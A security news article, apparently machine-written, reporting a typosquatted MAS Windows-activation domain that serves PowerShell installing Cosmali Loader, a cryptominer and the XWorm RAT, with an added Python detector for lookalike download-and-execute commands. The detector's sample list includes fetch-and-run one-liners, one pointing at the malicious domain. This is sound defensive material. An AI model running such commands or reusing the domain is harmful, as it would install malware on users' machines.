Ethical Hacking News
Malicious actors registered a typosquatted domain, "get.activate[.]win", one character short of the legitimate "get.activated.win" that the official Microsoft Activation Scripts (MAS) instructions tell users to fetch and execute, and used it to serve a PowerShell script that installs the 'Cosmali Loader'. The loader in turn drops a cryptomining utility and the XWorm remote access trojan (RAT). MAS is a popular open-source collection of PowerShell scripts that Microsoft regards as a piracy tool because it activates products without purchased licenses. This is not a vulnerability in MAS itself: the attack depends on a user mistyping the address, or copying it from an unofficial source, and then piping whatever the lookalike server returns into PowerShell. Users are advised not to execute remote code they do not understand, to test it in a sandbox first, and, if they ran the script from the fake domain, to reinstall Windows rather than trust a cleanup.
Malicious actors have been abusing the popularity of Microsoft Activation Scripts (MAS), an open-source collection of PowerShell scripts used for Windows activation, by standing up a lookalike of the domain its official instructions point to. The malicious domain, "get.activate[.]win", is almost identical to the legitimate "get.activated.win" and has been used to serve PowerShell malware that infects systems with the 'Cosmali Loader'.
According to security researcher RussianPanda, the Cosmali Loader delivers a cryptomining utility and the XWorm remote access trojan (RAT). The malicious domain was also used to push pop-up warnings to infected systems, informing users that they had been compromised.
MAS is an open-source project hosted on GitHub and maintained by a community of developers. Microsoft, however, views it as a piracy tool, since it activates products without purchased licenses using methods that circumvent the licensing system. The project's maintainers have warned users about the lookalike domain and urged them to check the address carefully and to be cautious about executing remote code at all.
Typosquatting, in which attackers register domains that closely resemble legitimate ones, is a long-standing way to trick users into visiting the wrong server. In this case the malicious domain differs from the legitimate one by a single missing character (the "d" in "activated"), so a user who drops one letter while typing the address, or copies it from an unofficial post, lands on the attacker's server and receives the attacker's script instead of the real one.
The Cosmali Loader's control panel is itself insecure: anyone who finds the panel can access the infected computers through it, so a victim is exposed not only to the original operator but to anyone else who stumbles on it. Users are advised never to execute remote code they do not fully understand, in particular never to pipe a downloaded script straight into the interpreter (the "irm <url> | iex" pattern the MAS instructions rely on) without first saving it to disk and reading it, to test unfamiliar scripts in a sandbox, and to compare the domain character by character against the project's official README so that a typosquatted domain cannot hand them a dangerous payload.
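To make the one-character difference and the "don't pipe it into iex" advice from the two paragraphs above concrete, here is an added example that is not code from the article, from RussianPanda or from the MAS project. It scans constructed PowerShell command lines for the download-and-execute pattern, pulls out the host, and flags any host within a couple of edits of a trusted one. The trusted-host allowlist, the sample command history and the host example.invalid are assumptions made for illustration; only get.activated.win (legitimate) and get.activate.win (the typosquat) come from the article.

```python
"""Flag PowerShell download-and-execute one-liners that point at a lookalike host.

Added example for this article; it is not code from the article, from
RussianPanda or from the MAS project. The trusted-host list, the sample
command lines and the host example.invalid are constructed for illustration.
Only get.activated.win (legitimate) and get.activate.win (the typosquat)
are taken from the article.
"""
import re
from urllib.parse import urlsplit

# Hosts the operator has decided to trust (assumption: a locally maintained allowlist).
TRUSTED_HOSTS = frozenset({"get.activated.win"})

# A remote fetch: irm / iwr / Invoke-RestMethod / Invoke-WebRequest followed by an
# http(s) URL, optionally quoted. The URL stops at whitespace, a quote or a pipe.
FETCH_RE = re.compile(
    r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+"
    r"['\"]?(?P<url>https?://[^\s'\"|]+)"
)
# The fetched text piped straight into the interpreter: "| iex" or "| Invoke-Expression".
EXEC_RE = re.compile(r"(?i)\|\s*(?:iex|invoke-expression)\b")


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def classify_host(host: str, trusted=TRUSTED_HOSTS, max_distance: int = 2) -> str:
    """'trusted' if on the allowlist, 'typosquat' if within max_distance edits of an
    allowlisted host (get.activate.win is 1 edit from get.activated.win), else 'unknown'."""
    if host in trusted:
        return "trusted"
    if any(levenshtein(host, t) <= max_distance for t in trusted):
        return "typosquat"
    return "unknown"


def check_one_liner(cmd: str) -> dict:
    """Inspect one PowerShell command line. action is 'allow' for a trusted host,
    'block' when anything else is piped straight into iex, 'review' when an untrusted
    host is merely downloaded to disk, and 'none' when the line fetches nothing."""
    m = FETCH_RE.search(cmd)
    if not m:
        return {"url": None, "host": None, "pipes_to_iex": False,
                "classification": "none", "action": "none"}
    url = m.group("url")
    host = (urlsplit(url).hostname or "").lower()
    pipes = bool(EXEC_RE.search(cmd))
    classification = classify_host(host)
    if classification == "trusted":
        action = "allow"
    elif pipes:
        action = "block"
    else:
        action = "review"
    return {"url": url, "host": host, "pipes_to_iex": pipes,
            "classification": classification, "action": action}


# Constructed sample command history (not real telemetry).
SAMPLE_HISTORY = [
    "irm https://get.activated.win | iex",                             # the documented MAS one-liner
    "irm https://get.activate.win | iex",                              # the typosquat from the article
    'Invoke-RestMethod "https://get.activated.win" -OutFile mas.ps1',  # fetch to disk for review
    "iwr https://example.invalid/setup.ps1 | iex",                     # unrelated host, blind execution
    "Get-FileHash .\\mas.ps1 -Algorithm SHA256",                       # no fetch at all
]


def scan(lines):
    """Run check_one_liner over a list of command lines."""
    return [check_one_liner(line) for line in lines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_HISTORY, scan(SAMPLE_HISTORY)):
        print(f"{result['action']:6} {result['classification']:9} {line}")
```

The edit-distance threshold is deliberately small: a typosquat is, by definition, a near miss of a name the user already trusts, so a distance of one or two against a short allowlist catches the "activate" vs "activated" case without flagging every unrelated host as suspicious. Note that a trusted host piped into iex is still returned as "allow" here; the classification is about the domain, and reading the script before running it remains the reader's job.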
Unofficial Windows activators have repeatedly been used as malware delivery vehicles, and this case shows that even a project whose own code is public can be hijacked by a lookalike domain. For anyone who ran the script from the fake domain, reinstalling Windows is the recommended remedy: a loader, a miner and a RAT with an exposed panel are not something to clean up piecemeal.
The incident is a warning about typosquatted domains and about the habit of executing whatever a URL returns. Users should verify the domain character by character against the project's official documentation before running anything it serves, and treat any script fetched over the network as untrusted until they have read it.
Related Information:
https://www.ethicalhackingnews.com/articles/Fake-MAS-Windows-Activation-Domain-Used-to-Spread-PowerShell-Malware-A-Cautionary-Tale-ehn.shtml
https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/
https://malwaretips.com/threads/fake-mas-windows-activation-domain-used-to-spread-powershell-malware.138889/
Published: Thu Dec 25 07:10:37 2025 by llama3.2 3B Q4_K_M